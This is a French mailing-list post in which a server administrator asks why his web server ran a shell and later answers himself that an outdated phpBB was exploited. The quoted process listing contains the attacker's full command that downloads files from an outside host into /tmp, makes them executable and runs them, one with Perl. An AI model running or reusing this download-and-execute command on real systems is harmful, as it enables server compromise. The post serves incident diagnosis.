Je me réponds à moi-même : apparemment un exploit contre un phpbb pas à
jour, le code de l'exploit est le suivant :
http://segfault.ch/codes/phpbb3.txt
-- Jean-Marc
> Hello folks,
>
> Décidément... Cette fois ci un hacker réussit à faire exécuter un shell à
> mon serveur http qui vient d'être mis à jour. Ce shell télécharge un
> fichier, le rend exécutable, le fait exécuter par perl.
>
> Heureusement, le programme en question cherche à écouter le port 8118 qui
> est bloqué sur ma machine.
>
> Mais comment diable peut-il faire exécuter un shell à mon serveur http ???
>
> Voilà ce que me sort un ps axuwww :
> 9022 ? S 0:00 \_ httpd2 -f /etc/httpd/conf/httpd2.conf
> -DAPACHE2 -DHAVE_PHP4 -DHAVE_PYTHON -DHAVE_SUEXEC -DHAVE_ACCESS
> -DHAVE_ACTIONS -DHAVE_ALIAS -DHAVE_ASIS -DHAVE_AUTH_ANON -DHAVE_AUTH_DBM
> -DHAVE_AUTH_DIGEST -DHAVE_AUTH -DHAVE_AUTOINDEX
> -DHAVE_CASE_FILTER_IN-DHAVE_CASE_FILTER -DHAVE_CERN_META -DHAVE_CGID
> -DHAVE_CGI -DHAVE_CHARSET_LITE -DHAVE_DAV_FS -DHAVE_DAV -DHAVE_DEFLATE
> -DHAVE_DIR -DHAVE_DUMPIO -DHAVE_ENV -DHAVE_EXPIRES -DHAVE_EXT_FILTER
> -DHAVE_HEADERS -DHAVE_IMAP -DHAVE_INCLUDE -DHAVE_INFO -DHAVE_LOG_CONFIG
> -DHAVE_LOG_FORENSIC -DHAVE_LOGIO -DHAVE_MIME_MAGIC -DHAVE_MIME
> -DHAVE_NEGOTIATION -DHAVE_REWRITE -DHAVE_SETENVIF -DHAVE_SPELING
> -DHAVE_STATUS -DHAVE_UNIQUE_ID -DHAVE_USERDIR -DHAVE_USERTRACK
> -DHAVE_VHOST_ALIAS
> 9039 ? S 0:00 | \_ sh -c cd /tmp;wget
> www58.mediaserve.net/.dump/httpd;chmod +x httpd;./httpd;cd /tmp;wget
> www58.mediaserve.net/.dump/httpd.txt;chmod +x httpd.txt;perl httpd.txt
> 9047 ? S 0:01 | \_ perl httpd.txt
>
> Any hints ?
> Merci
> -- Jean-Marc
>
>
>